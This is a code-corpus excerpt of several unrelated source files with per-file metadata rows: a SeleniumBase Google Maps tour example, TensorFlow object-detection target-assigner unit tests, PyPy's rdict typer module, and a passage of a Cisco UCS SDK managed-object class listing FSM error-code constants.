self.add_tour_step("Then click here to show it on the map.",
"#searchbox-searchbutton", alignment="bottom")
self.add_tour_step("Or click here to get driving directions.",
"#searchbox-directions", alignment="bottom")
self.add_tour_step("Use this button to switch to Satellite view.",
"#minimap div.widget-minimap", alignment="right")
self.add_tour_step("Click here to zoom in.",
"#widget-zoom-in", alignment="left")
self.add_tour_step("Or click here to zoom out.",
"#widget-zoom-out", alignment="left")
self.add_tour_step("Use the Menu button to see more options.",
".searchbox-hamburger-container", alignment="right")
self.add_tour_step("Or click here to see more Google apps.",
'[title="Google apps"]', alignment="left")
self.add_tour_step("Thanks for using SeleniumBase Tours!",
title="End of Guided Tour")
self.export_tour() # The default name for exports is "my_tour.js"
self.play_tour()
| examples/tour_examples/google_tour.py | 3,274 | Create a website tour using the ShepherdJS library with "dark" theme Same as: self.create_shepherd_tour(theme="dark") Wait for autocomplete Create a website tour using the ShepherdJS library with "light" theme Same as: self.create_shepherd_tour(theme="light") Create a website tour using the Bootstrap Tour JS library Same as: self.create_bootstrap_tour() Tour automatically continues after 5 sec Create a website tour using the IntroJS library Same as: self.create_introjs_tour() The default name for exports is "my_tour.js" | 529 | en | 0.565826 |
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for utils.target_assigner_utils."""
from absl.testing import parameterized
import numpy as np
import tensorflow.compat.v1 as tf
from object_detection.utils import target_assigner_utils as ta_utils
from object_detection.utils import test_case
class TargetUtilTest(parameterized.TestCase, test_case.TestCase):
def test_image_shape_to_grids(self):
def graph_fn():
(y_grid, x_grid) = ta_utils.image_shape_to_grids(height=2, width=3)
return y_grid, x_grid
expected_y_grid = np.array([[0, 0, 0], [1, 1, 1]])
expected_x_grid = np.array([[0, 1, 2], [0, 1, 2]])
y_grid, x_grid = self.execute(graph_fn, [])
np.testing.assert_array_equal(y_grid, expected_y_grid)
np.testing.assert_array_equal(x_grid, expected_x_grid)
@parameterized.parameters((False,), (True,))
def test_coordinates_to_heatmap(self, sparse):
if not hasattr(tf, 'tensor_scatter_nd_max'):
self.skipTest('Cannot test function due to old TF version.')
def graph_fn():
(y_grid, x_grid) = ta_utils.image_shape_to_grids(height=3, width=5)
y_coordinates = tf.constant([1.5, 0.5], dtype=tf.float32)
x_coordinates = tf.constant([2.5, 4.5], dtype=tf.float32)
sigma = tf.constant([0.1, 0.5], dtype=tf.float32)
channel_onehot = tf.constant([[1, 0, 0], [0, 1, 0]], dtype=tf.float32)
channel_weights = tf.constant([1, 1], dtype=tf.float32)
heatmap = ta_utils.coordinates_to_heatmap(y_grid, x_grid, y_coordinates,
x_coordinates, sigma,
channel_onehot,
channel_weights, sparse=sparse)
return heatmap
heatmap = self.execute(graph_fn, [])
# Peak at (1, 2) for the first class.
self.assertAlmostEqual(1.0, heatmap[1, 2, 0])
# Peak at (0, 4) for the second class.
self.assertAlmostEqual(1.0, heatmap[0, 4, 1])
def test_compute_floor_offsets_with_indices_onlysource(self):
def graph_fn():
y_source = tf.constant([1.5, 0.3], dtype=tf.float32)
x_source = tf.constant([2.5, 4.2], dtype=tf.float32)
(offsets, indices) = ta_utils.compute_floor_offsets_with_indices(
y_source, x_source)
return offsets, indices
offsets, indices = self.execute(graph_fn, [])
np.testing.assert_array_almost_equal(offsets,
np.array([[0.5, 0.5], [0.3, 0.2]]))
np.testing.assert_array_almost_equal(indices,
np.array([[1, 2], [0, 4]]))
def test_compute_floor_offsets_with_indices_and_targets(self):
def graph_fn():
y_source = tf.constant([1.5, 0.3], dtype=tf.float32)
x_source = tf.constant([2.5, 4.2], dtype=tf.float32)
y_target = tf.constant([2.1, 0.1], dtype=tf.float32)
x_target = tf.constant([1.2, 4.5], dtype=tf.float32)
(offsets, indices) = ta_utils.compute_floor_offsets_with_indices(
y_source, x_source, y_target, x_target)
return offsets, indices
offsets, indices = self.execute(graph_fn, [])
np.testing.assert_array_almost_equal(offsets,
np.array([[1.1, -0.8], [0.1, 0.5]]))
np.testing.assert_array_almost_equal(indices, np.array([[1, 2], [0, 4]]))
def test_compute_floor_offsets_with_indices_multisources(self):
def graph_fn():
y_source = tf.constant([[1.0, 0.0], [2.0, 3.0]], dtype=tf.float32)
x_source = tf.constant([[2.0, 4.0], [3.0, 3.0]], dtype=tf.float32)
y_target = tf.constant([2.1, 0.1], dtype=tf.float32)
x_target = tf.constant([1.2, 4.5], dtype=tf.float32)
(offsets, indices) = ta_utils.compute_floor_offsets_with_indices(
y_source, x_source, y_target, x_target)
return offsets, indices
offsets, indices = self.execute(graph_fn, [])
# Offset from the first source to target.
np.testing.assert_array_almost_equal(offsets[:, 0, :],
np.array([[1.1, -0.8], [-1.9, 1.5]]))
# Offset from the second source to target.
np.testing.assert_array_almost_equal(offsets[:, 1, :],
np.array([[2.1, -2.8], [-2.9, 1.5]]))
# Indices from the first source to target.
np.testing.assert_array_almost_equal(indices[:, 0, :],
np.array([[1, 2], [2, 3]]))
# Indices from the second source to target.
np.testing.assert_array_almost_equal(indices[:, 1, :],
np.array([[0, 4], [3, 3]]))
def test_get_valid_keypoints_mask(self):
def graph_fn():
class_onehot = tf.constant(
[[0, 0, 1, 0, 0],
[0, 1, 0, 0, 0],
[0, 0, 1, 0, 1]], dtype=tf.float32)
keypoints = tf.constant(
[[0.1, float('nan'), 0.2, 0.0],
[0.0, 0.0, 0.1, 0.9],
[3.2, 4.3, float('nan'), 0.2]],
dtype=tf.float32)
keypoint_coordinates = tf.stack([keypoints, keypoints], axis=2)
mask, keypoints_nan_to_zeros = ta_utils.get_valid_keypoint_mask_for_class(
keypoint_coordinates=keypoint_coordinates,
class_id=2,
class_onehot=class_onehot,
keypoint_indices=[1, 2])
return mask, keypoints_nan_to_zeros
keypoints = np.array([[0.0, 0.2],
[0.0, 0.1],
[4.3, 0.0]])
expected_mask = np.array([[0, 1], [0, 0], [1, 0]])
expected_keypoints = np.stack([keypoints, keypoints], axis=2)
mask, keypoints_nan_to_zeros = self.execute(graph_fn, [])
np.testing.assert_array_equal(mask, expected_mask)
np.testing.assert_array_almost_equal(keypoints_nan_to_zeros,
expected_keypoints)
def test_get_valid_keypoints_with_mask(self):
def graph_fn():
class_onehot = tf.constant(
[[0, 0, 1, 0, 0],
[0, 1, 0, 0, 0],
[0, 0, 1, 0, 1]], dtype=tf.float32)
keypoints = tf.constant(
[[0.1, float('nan'), 0.2, 0.0],
[0.0, 0.0, 0.1, 0.9],
[3.2, 4.3, float('nan'), 0.2]],
dtype=tf.float32)
keypoint_coordinates = tf.stack([keypoints, keypoints], axis=2)
weights = tf.constant([0.0, 0.0, 1.0])
mask, keypoints_nan_to_zeros = ta_utils.get_valid_keypoint_mask_for_class(
keypoint_coordinates=keypoint_coordinates,
class_id=2,
class_onehot=class_onehot,
class_weights=weights,
keypoint_indices=[1, 2])
return mask, keypoints_nan_to_zeros
expected_mask = np.array([[0, 0], [0, 0], [1, 0]])
keypoints = np.array([[0.0, 0.2],
[0.0, 0.1],
[4.3, 0.0]])
expected_keypoints = np.stack([keypoints, keypoints], axis=2)
mask, keypoints_nan_to_zeros = self.execute(graph_fn, [])
np.testing.assert_array_equal(mask, expected_mask)
np.testing.assert_array_almost_equal(keypoints_nan_to_zeros,
expected_keypoints)
def test_blackout_pixel_weights_by_box_regions(self):
def graph_fn():
boxes = tf.constant(
[[0.0, 0.0, 5, 5], [0.0, 0.0, 10.0, 20.0], [6.0, 12.0, 8.0, 18.0]],
dtype=tf.float32)
blackout = tf.constant([True, False, True], dtype=tf.bool)
blackout_pixel_weights_by_box_regions = tf.function(
ta_utils.blackout_pixel_weights_by_box_regions)
output = blackout_pixel_weights_by_box_regions(10, 20, boxes, blackout)
return output
output = self.execute(graph_fn, [])
# All zeros in region [0:6, 0:6].
self.assertAlmostEqual(np.sum(output[0:6, 0:6]), 0.0)
# All zeros in region [12:19, 6:9].
self.assertAlmostEqual(np.sum(output[6:9, 12:19]), 0.0)
# All other pixel weights should be 1.0.
# 20 * 10 - 6 * 6 - 3 * 7 = 143.0
self.assertAlmostEqual(np.sum(output), 143.0)
def test_blackout_pixel_weights_by_box_regions_zero_instance(self):
def graph_fn():
boxes = tf.zeros([0, 4], dtype=tf.float32)
blackout = tf.zeros([0], dtype=tf.bool)
blackout_pixel_weights_by_box_regions = tf.function(
ta_utils.blackout_pixel_weights_by_box_regions)
output = blackout_pixel_weights_by_box_regions(10, 20, boxes, blackout)
return output
output = self.execute(graph_fn, [])
# The output should be all 1s since there's no annotation provided.
np.testing.assert_array_equal(output, np.ones([10, 20], dtype=np.float32))
def test_get_surrounding_grids(self):
def graph_fn():
y_coordinates = tf.constant([0.5], dtype=tf.float32)
x_coordinates = tf.constant([4.5], dtype=tf.float32)
output = ta_utils.get_surrounding_grids(
height=3,
width=5,
y_coordinates=y_coordinates,
x_coordinates=x_coordinates,
radius=1)
return output
y_indices, x_indices, valid = self.execute(graph_fn, [])
# Five neighboring indices: [-1, 4] (out of bound), [0, 3], [0, 4],
# [0, 5] (out of bound), [1, 4].
np.testing.assert_array_almost_equal(
y_indices,
np.array([[0.0, 0.0, 0.0, 0.0, 1.0]]))
np.testing.assert_array_almost_equal(
x_indices,
np.array([[0.0, 3.0, 4.0, 0.0, 4.0]]))
self.assertAllEqual(valid, [[False, True, True, False, True]])
if __name__ == '__main__':
tf.test.main()
| object_detection/utils/target_assigner_utils_test.py | 10,334 | Tests for utils.target_assigner_utils.
Copyright 2020 The TensorFlow Authors. All Rights Reserved. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. ============================================================================== Peak at (1, 2) for the first class. Peak at (0, 4) for the second class. Offset from the first source to target. Offset from the second source to target. Indices from the first source to target. Indices from the second source to target. All zeros in region [0:6, 0:6]. All zeros in region [12:19, 6:9]. All other pixel weights should be 1.0. 20 * 10 - 6 * 6 - 3 * 7 = 143.0 The output should be all 1s since there's no annotation provided. Five neighboring indices: [-1, 4] (out of bound), [0, 3], [0, 4], [0, 5] (out of bound), [1, 4]. | 1,238 | en | 0.837674 |
from pypy.tool.pairtype import pairtype
from pypy.annotation import model as annmodel
from pypy.objspace.flow.model import Constant
from pypy.rpython.lltypesystem import lltype
from pypy.rlib.rarithmetic import r_uint
from pypy.rlib.objectmodel import hlinvoke
from pypy.rpython import robject
from pypy.rlib import objectmodel
from pypy.rpython import rmodel
class __extend__(annmodel.SomeDict):
def rtyper_makerepr(self, rtyper):
dictkey = self.dictdef.dictkey
dictvalue = self.dictdef.dictvalue
s_key = dictkey .s_value
s_value = dictvalue.s_value
force_non_null = self.dictdef.force_non_null
if (s_key.__class__ is annmodel.SomeObject and s_key.knowntype == object and
s_value.__class__ is annmodel.SomeObject and s_value.knowntype == object):
return robject.pyobj_repr
else:
if dictkey.custom_eq_hash:
custom_eq_hash = lambda: (rtyper.getrepr(dictkey.s_rdict_eqfn),
rtyper.getrepr(dictkey.s_rdict_hashfn))
else:
custom_eq_hash = None
return rtyper.type_system.rdict.DictRepr(rtyper,
lambda: rtyper.getrepr(s_key),
lambda: rtyper.getrepr(s_value),
dictkey,
dictvalue,
custom_eq_hash,
force_non_null)
def rtyper_makekey(self):
self.dictdef.dictkey .dont_change_any_more = True
self.dictdef.dictvalue.dont_change_any_more = True
return (self.__class__, self.dictdef.dictkey, self.dictdef.dictvalue)
class AbstractDictRepr(rmodel.Repr):
def pickrepr(self, item_repr):
if self.custom_eq_hash:
return item_repr, item_repr
else:
return self._externalvsinternal(self.rtyper, item_repr)
pickkeyrepr = pickrepr
def compact_repr(self):
return 'DictR %s %s' % (self.key_repr.compact_repr(), self.value_repr.compact_repr())
def recast_value(self, llops, v):
return llops.convertvar(v, self.value_repr, self.external_value_repr)
def recast_key(self, llops, v):
return llops.convertvar(v, self.key_repr, self.external_key_repr)
def rtype_newdict(hop):
hop.inputargs() # no arguments expected
r_dict = hop.r_result
if r_dict == robject.pyobj_repr: # special case: SomeObject: SomeObject dicts!
cdict = hop.inputconst(robject.pyobj_repr, dict)
return hop.genop('simple_call', [cdict], resulttype = robject.pyobj_repr)
cDICT = hop.inputconst(lltype.Void, r_dict.DICT)
v_result = hop.gendirectcall(hop.rtyper.type_system.rdict.ll_newdict, cDICT)
return v_result
class AbstractDictIteratorRepr(rmodel.IteratorRepr):
def newiter(self, hop):
v_dict, = hop.inputargs(self.r_dict)
citerptr = hop.inputconst(lltype.Void, self.lowleveltype)
return hop.gendirectcall(self.ll_dictiter, citerptr, v_dict)
def rtype_next(self, hop):
variant = self.variant
v_iter, = hop.inputargs(self)
if variant in ('keys', 'values'):
c1 = hop.inputconst(lltype.Void, None)
else:
c1 = hop.inputconst(lltype.Void, hop.r_result.lowleveltype)
# record that we know about these two possible exceptions
hop.has_implicit_exception(StopIteration)
hop.has_implicit_exception(RuntimeError)
hop.exception_is_here()
v = hop.gendirectcall(self.ll_dictnext, c1, v_iter)
if variant == 'keys':
return self.r_dict.recast_key(hop.llops, v)
elif variant == 'values':
return self.r_dict.recast_value(hop.llops, v)
else:
return v
| pypy/rpython/rdict.py | 3,957 | no arguments expected special case: SomeObject: SomeObject dicts! record that we know about these two possible exceptions | 121 | en | 0.827779 |
"""This module contains the general information for IdentMetaSystemFsm ManagedObject."""
from ...ucsmo import ManagedObject
from ...ucscoremeta import MoPropertyMeta, MoMeta
from ...ucsmeta import VersionMeta
class IdentMetaSystemFsmConsts:
COMPLETION_TIME_ = ""
CURRENT_FSM_NOP = "nop"
CURRENT_FSM_SYNC = "sync"
CURRENT_FSM_UCSC_UNIV_SYNC = "ucscUnivSync"
FSM_STATUS_FAIL = "fail"
FSM_STATUS_IN_PROGRESS = "inProgress"
FSM_STATUS_NOP = "nop"
FSM_STATUS_PENDING = "pending"
FSM_STATUS_SKIP = "skip"
FSM_STATUS_SUCCESS = "success"
FSM_STATUS_THROTTLED = "throttled"
RMT_ERR_CODE_ERR_2FA_AUTH_RETRY = "ERR-2fa-auth-retry"
RMT_ERR_CODE_ERR_ACTIVATE_FAILED = "ERR-ACTIVATE-failed"
RMT_ERR_CODE_ERR_ACTIVATE_IN_PROGRESS = "ERR-ACTIVATE-in-progress"
RMT_ERR_CODE_ERR_ACTIVATE_RETRY = "ERR-ACTIVATE-retry"
RMT_ERR_CODE_ERR_BIOS_TOKENS_OLD_BIOS = "ERR-BIOS-TOKENS-OLD-BIOS"
RMT_ERR_CODE_ERR_BIOS_TOKENS_OLD_CIMC = "ERR-BIOS-TOKENS-OLD-CIMC"
RMT_ERR_CODE_ERR_BIOS_NETWORK_BOOT_ORDER_NOT_FOUND = "ERR-BIOS-network-boot-order-not-found"
RMT_ERR_CODE_ERR_BOARDCTRLUPDATE_IGNORE = "ERR-BOARDCTRLUPDATE-ignore"
RMT_ERR_CODE_ERR_DIAG_CANCELLED = "ERR-DIAG-cancelled"
RMT_ERR_CODE_ERR_DIAG_FSM_RESTARTED = "ERR-DIAG-fsm-restarted"
RMT_ERR_CODE_ERR_DIAG_TEST_FAILED = "ERR-DIAG-test-failed"
RMT_ERR_CODE_ERR_DNLD_AUTHENTICATION_FAILURE = "ERR-DNLD-authentication-failure"
RMT_ERR_CODE_ERR_DNLD_HOSTKEY_MISMATCH = "ERR-DNLD-hostkey-mismatch"
RMT_ERR_CODE_ERR_DNLD_INVALID_IMAGE = "ERR-DNLD-invalid-image"
RMT_ERR_CODE_ERR_DNLD_NO_FILE = "ERR-DNLD-no-file"
RMT_ERR_CODE_ERR_DNLD_NO_SPACE = "ERR-DNLD-no-space"
RMT_ERR_CODE_ERR_DNLD_USB_UNMOUNTED = "ERR-DNLD-usb-unmounted"
RMT_ERR_CODE_ERR_DNS_DELETE_ERROR = "ERR-DNS-delete-error"
RMT_ERR_CODE_ERR_DNS_GET_ERROR = "ERR-DNS-get-error"
RMT_ERR_CODE_ERR_DNS_SET_ERROR = "ERR-DNS-set-error"
RMT_ERR_CODE_ERR_DIAGNOSTICS_IN_PROGRESS = "ERR-Diagnostics-in-progress"
RMT_ERR_CODE_ERR_DIAGNOSTICS_MEMTEST_IN_PROGRESS = "ERR-Diagnostics-memtest-in-progress"
RMT_ERR_CODE_ERR_DIAGNOSTICS_NETWORK_IN_PROGRESS = "ERR-Diagnostics-network-in-progress"
RMT_ERR_CODE_ERR_FILTER_ILLEGAL_FORMAT = "ERR-FILTER-illegal-format"
RMT_ERR_CODE_ERR_FSM_NO_SUCH_STATE = "ERR-FSM-no-such-state"
RMT_ERR_CODE_ERR_HOST_FRU_IDENTITY_MISMATCH = "ERR-HOST-fru-identity-mismatch"
RMT_ERR_CODE_ERR_HTTP_SET_ERROR = "ERR-HTTP-set-error"
RMT_ERR_CODE_ERR_HTTPS_SET_ERROR = "ERR-HTTPS-set-error"
RMT_ERR_CODE_ERR_IBMC_ANALYZE_RESULTS = "ERR-IBMC-analyze-results"
RMT_ERR_CODE_ERR_IBMC_CONNECT_ERROR = "ERR-IBMC-connect-error"
RMT_ERR_CODE_ERR_IBMC_CONNECTOR_INFO_RETRIEVAL_ERROR = "ERR-IBMC-connector-info-retrieval-error"
RMT_ERR_CODE_ERR_IBMC_FRU_RETRIEVAL_ERROR = "ERR-IBMC-fru-retrieval-error"
RMT_ERR_CODE_ERR_IBMC_INVALID_END_POINT_CONFIG = "ERR-IBMC-invalid-end-point-config"
RMT_ERR_CODE_ERR_IBMC_RESULTS_NOT_READY = "ERR-IBMC-results-not-ready"
RMT_ERR_CODE_ERR_MAX_SUBSCRIPTIONS_ALLOWED_ERROR = "ERR-MAX-subscriptions-allowed-error"
RMT_ERR_CODE_ERR_MO_CONFIG_CHILD_OBJECT_CANT_BE_CONFIGURED = "ERR-MO-CONFIG-child-object-cant-be-configured"
RMT_ERR_CODE_ERR_MO_META_NO_SUCH_OBJECT_CLASS = "ERR-MO-META-no-such-object-class"
RMT_ERR_CODE_ERR_MO_PROPERTY_NO_SUCH_PROPERTY = "ERR-MO-PROPERTY-no-such-property"
RMT_ERR_CODE_ERR_MO_PROPERTY_VALUE_OUT_OF_RANGE = "ERR-MO-PROPERTY-value-out-of-range"
RMT_ERR_CODE_ERR_MO_ACCESS_DENIED = "ERR-MO-access-denied"
RMT_ERR_CODE_ERR_MO_DELETION_RULE_VIOLATION = "ERR-MO-deletion-rule-violation"
RMT_ERR_CODE_ERR_MO_DUPLICATE_OBJECT = "ERR-MO-duplicate-object"
RMT_ERR_CODE_ERR_MO_ILLEGAL_CONTAINMENT = "ERR-MO-illegal-containment"
RMT_ERR_CODE_ERR_MO_ILLEGAL_CREATION = "ERR-MO-illegal-creation"
RMT_ERR_CODE_ERR_MO_ILLEGAL_ITERATOR_STATE = "ERR-MO-illegal-iterator-state"
RMT_ERR_CODE_ERR_MO_ILLEGAL_OBJECT_LIFECYCLE_TRANSITION = "ERR-MO-illegal-object-lifecycle-transition"
RMT_ERR_CODE_ERR_MO_NAMING_RULE_VIOLATION = "ERR-MO-naming-rule-violation"
RMT_ERR_CODE_ERR_MO_OBJECT_NOT_FOUND = "ERR-MO-object-not-found"
RMT_ERR_CODE_ERR_MO_RESOURCE_ALLOCATION = "ERR-MO-resource-allocation"
RMT_ERR_CODE_ERR_NTP_DELETE_ERROR = "ERR-NTP-delete-error"
RMT_ERR_CODE_ERR_NTP_GET_ERROR = "ERR-NTP-get-error"
RMT_ERR_CODE_ERR_NTP_SET_ERROR = "ERR-NTP-set-error"
RMT_ERR_CODE_ERR_POWER_CAP_UNSUPPORTED = "ERR-POWER-CAP-UNSUPPORTED"
RMT_ERR_CODE_ERR_POWER_PROFILE_IN_PROGRESS = "ERR-POWER-PROFILE-IN-PROGRESS"
RMT_ERR_CODE_ERR_SERVER_MIS_CONNECT = "ERR-SERVER-mis-connect"
RMT_ERR_CODE_ERR_SWITCH_INVALID_IF_CONFIG = "ERR-SWITCH-invalid-if-config"
RMT_ERR_CODE_ERR_TOKEN_REQUEST_DENIED = "ERR-TOKEN-request-denied"
RMT_ERR_CODE_ERR_UNABLE_TO_FETCH_BIOS_SETTINGS = "ERR-UNABLE-TO-FETCH-BIOS-SETTINGS"
RMT_ERR_CODE_ERR_UPDATE_FAILED = "ERR-UPDATE-failed"
RMT_ERR_CODE_ERR_UPDATE_IN_PROGRESS = "ERR-UPDATE-in-progress"
RMT_ERR_CODE_ERR_UPDATE_RETRY = "ERR-UPDATE-retry"
RMT_ERR_CODE_ERR_AAA_CONFIG_MODIFY_ERROR = "ERR-aaa-config-modify-error"
RMT_ERR_CODE_ERR_ACCT_REALM_SET_ERROR = "ERR-acct-realm-set-error"
RMT_ERR_CODE_ERR_ADMIN_PASSWD_SET = "ERR-admin-passwd-set"
RMT_ERR_CODE_ERR_AUTH_ISSUE = "ERR-auth-issue"
RMT_ERR_CODE_ERR_AUTH_REALM_GET_ERROR = "ERR-auth-realm-get-error"
RMT_ERR_CODE_ERR_AUTH_REALM_SET_ERROR = "ERR-auth-realm-set-error"
RMT_ERR_CODE_ERR_AUTHENTICATION = "ERR-authentication"
RMT_ERR_CODE_ERR_AUTHORIZATION_REQUIRED = "ERR-authorization-required"
RMT_ERR_CODE_ERR_CLI_SESSION_LIMIT_REACHED = "ERR-cli-session-limit-reached"
RMT_ERR_CODE_ERR_CREATE_KEYRING = "ERR-create-keyring"
RMT_ERR_CODE_ERR_CREATE_LOCALE = "ERR-create-locale"
RMT_ERR_CODE_ERR_CREATE_ROLE = "ERR-create-role"
RMT_ERR_CODE_ERR_CREATE_TP = "ERR-create-tp"
RMT_ERR_CODE_ERR_CREATE_USER = "ERR-create-user"
RMT_ERR_CODE_ERR_DELETE_LOCALE = "ERR-delete-locale"
RMT_ERR_CODE_ERR_DELETE_ROLE = "ERR-delete-role"
RMT_ERR_CODE_ERR_DELETE_SESSION = "ERR-delete-session"
RMT_ERR_CODE_ERR_DELETE_USER = "ERR-delete-user"
RMT_ERR_CODE_ERR_DOWNGRADE_FAIL = "ERR-downgrade-fail"
RMT_ERR_CODE_ERR_EFI_DIAGNOSTICS_IN_PROGRESS = "ERR-efi-Diagnostics--in-progress"
RMT_ERR_CODE_ERR_ENABLE_MGMT_CONN = "ERR-enable-mgmt-conn"
RMT_ERR_CODE_ERR_EP_SET_ERROR = "ERR-ep-set-error"
RMT_ERR_CODE_ERR_GET_MAX_HTTP_USER_SESSIONS = "ERR-get-max-http-user-sessions"
RMT_ERR_CODE_ERR_HTTP_INITIALIZING = "ERR-http-initializing"
RMT_ERR_CODE_ERR_INSUFFICIENTLY_EQUIPPED = "ERR-insufficiently-equipped"
RMT_ERR_CODE_ERR_INTERNAL_ERROR = "ERR-internal-error"
RMT_ERR_CODE_ERR_LDAP_DELETE_ERROR = "ERR-ldap-delete-error"
RMT_ERR_CODE_ERR_LDAP_GET_ERROR = "ERR-ldap-get-error"
RMT_ERR_CODE_ERR_LDAP_GROUP_MODIFY_ERROR = "ERR-ldap-group-modify-error"
RMT_ERR_CODE_ERR_LDAP_GROUP_SET_ERROR = "ERR-ldap-group-set-error"
RMT_ERR_CODE_ERR_LDAP_SET_ERROR = "ERR-ldap-set-error"
RMT_ERR_CODE_ERR_LOCALE_SET_ERROR = "ERR-locale-set-error"
RMT_ERR_CODE_ERR_MAX_USERID_SESSIONS_REACHED = "ERR-max-userid-sessions-reached"
RMT_ERR_CODE_ERR_MISSING_METHOD = "ERR-missing-method"
RMT_ERR_CODE_ERR_MODIFY_LOCALE = "ERR-modify-locale"
RMT_ERR_CODE_ERR_MODIFY_ROLE = "ERR-modify-role"
RMT_ERR_CODE_ERR_MODIFY_USER = "ERR-modify-user"
RMT_ERR_CODE_ERR_MODIFY_USER_LOCALE = "ERR-modify-user-locale"
RMT_ERR_CODE_ERR_MODIFY_USER_ROLE = "ERR-modify-user-role"
RMT_ERR_CODE_ERR_PROVIDER_GROUP_MODIFY_ERROR = "ERR-provider-group-modify-error"
RMT_ERR_CODE_ERR_PROVIDER_GROUP_SET_ERROR = "ERR-provider-group-set-error"
RMT_ERR_CODE_ERR_RADIUS_GET_ERROR = "ERR-radius-get-error"
RMT_ERR_CODE_ERR_RADIUS_GLOBAL_SET_ERROR = "ERR-radius-global-set-error"
RMT_ERR_CODE_ERR_RADIUS_GROUP_SET_ERROR = "ERR-radius-group-set-error"
RMT_ERR_CODE_ERR_RADIUS_SET_ERROR = "ERR-radius-set-error"
RMT_ERR_CODE_ERR_REQUEST_TIMEOUT = "ERR-request-timeout"
RMT_ERR_CODE_ERR_RESET_ADAPTER = "ERR-reset-adapter"
RMT_ERR_CODE_ERR_ROLE_SET_ERROR = "ERR-role-set-error"
RMT_ERR_CODE_ERR_SECONDARY_NODE = "ERR-secondary-node"
RMT_ERR_CODE_ERR_SERVICE_NOT_READY = "ERR-service-not-ready"
RMT_ERR_CODE_ERR_SESSION_CACHE_FULL = "ERR-session-cache-full"
RMT_ERR_CODE_ERR_SESSION_NOT_FOUND = "ERR-session-not-found"
RMT_ERR_CODE_ERR_SET_KEY_CERT = "ERR-set-key-cert"
RMT_ERR_CODE_ERR_SET_LOGIN_PROFILE = "ERR-set-login-profile"
RMT_ERR_CODE_ERR_SET_MIN_PASSPHRASE_LENGTH = "ERR-set-min-passphrase-length"
RMT_ERR_CODE_ERR_SET_NETWORK = "ERR-set-network"
RMT_ERR_CODE_ERR_SET_PASSWORD_STRENGTH_CHECK = "ERR-set-password-strength-check"
RMT_ERR_CODE_ERR_SET_PORT_CHANNEL = "ERR-set-port-channel"
RMT_ERR_CODE_ERR_STORE_PRE_LOGIN_BANNER_MSG = "ERR-store-pre-login-banner-msg"
RMT_ERR_CODE_ERR_TACACS_ENABLE_ERROR = "ERR-tacacs-enable-error"
RMT_ERR_CODE_ERR_TACACS_GLOBAL_SET_ERROR = "ERR-tacacs-global-set-error"
RMT_ERR_CODE_ERR_TACACS_GROUP_SET_ERROR = "ERR-tacacs-group-set-error"
RMT_ERR_CODE_ERR_TACACS_PLUS_GET_ERROR = "ERR-tacacs-plus-get-error"
RMT_ERR_CODE_ERR_TACACS_SET_ERROR = "ERR-tacacs-set-error"
RMT_ERR_CODE_ERR_TEST_ERROR_1 = "ERR-test-error-1"
RMT_ERR_CODE_ERR_TEST_ERROR_2 = "ERR-test-error-2"
RMT_ERR_CODE_ERR_TIMEZONE_SET_ERROR = "ERR-timezone-set-error"
RMT_ERR_CODE_ERR_USER_ACCOUNT_EXPIRED = "ERR-user-account-expired"
RMT_ERR_CODE_ERR_USER_PASSWD_EXPIRED = "ERR-user-passwd-expired"
RMT_ERR_CODE_ERR_USER_SET_ERROR = "ERR-user-set-error"
RMT_ERR_CODE_ERR_XML_PARSE_ERROR = "ERR-xml-parse-error"
RMT_ERR_CODE_NONE = "none"
class IdentMetaSystemFsm(ManagedObject):
"""This is IdentMetaSystemFsm class."""
consts = IdentMetaSystemFsmConsts()
naming_props = set([])
mo_meta = MoMeta("IdentMetaSystemFsm", "identMetaSystemFsm", "fsm", VersionMeta.Version211a, "OutputOnly", 0xf, [], [""], ['identMetaSystem'], ['identMetaSystemFsmStage'], [None])
prop_meta = {
"child_action": MoPropertyMeta("child_action", "childAction", "string", VersionMeta.Version211a, MoPropertyMeta.INTERNAL, None, None, None, r"""((deleteAll|ignore|deleteNonPresent),){0,2}(deleteAll|ignore|deleteNonPresent){0,1}""", [], []),
"completion_time": MoPropertyMeta("completion_time", "completionTime", "string", VersionMeta.Version211a, MoPropertyMeta.READ_ONLY, None, None, None, r"""([0-9]){4}-([0-9]){2}-([0-9]){2}T([0-9]){2}:([0-9]){2}:([0-9]){2}((\.([0-9]){3})){0,1}""", [""], []),
"current_fsm": MoPropertyMeta("current_fsm", "currentFsm", "string", VersionMeta.Version211a, MoPropertyMeta.READ_ONLY, None, None, None, None, ["nop", "sync", "ucscUnivSync"], []),
"descr": MoPropertyMeta("descr", "descr", "string", VersionMeta.Version211a, MoPropertyMeta.READ_ONLY, None, None, None, r"""[ !#$%&\(\)\*\+,\-\./:;\?@\[\]_\{\|\}~a-zA-Z0-9]{0,256}""", [], []),
"dn": MoPropertyMeta("dn", "dn", "string", VersionMeta.Version211a, MoPropertyMeta.READ_ONLY, 0x2, 0, 256, None, [], []),
"fsm_status": MoPropertyMeta("fsm_status", "fsmStatus", "string", VersionMeta.Version211a, MoPropertyMeta.INTERNAL, None, None, None, None, ["fail", "inProgress", "nop", "pending", "skip", "success", "throttled"], []),
"instance_id": MoPropertyMeta("instance_id", "instanceId", "uint", VersionMeta.Version211a, MoPropertyMeta.READ_ONLY, None, None, None, None, [], []),
"progress": MoPropertyMeta("progress", "progress", "byte", VersionMeta.Version211a, MoPropertyMeta.READ_ONLY, None, None, None, None, [], ["0-100"]),
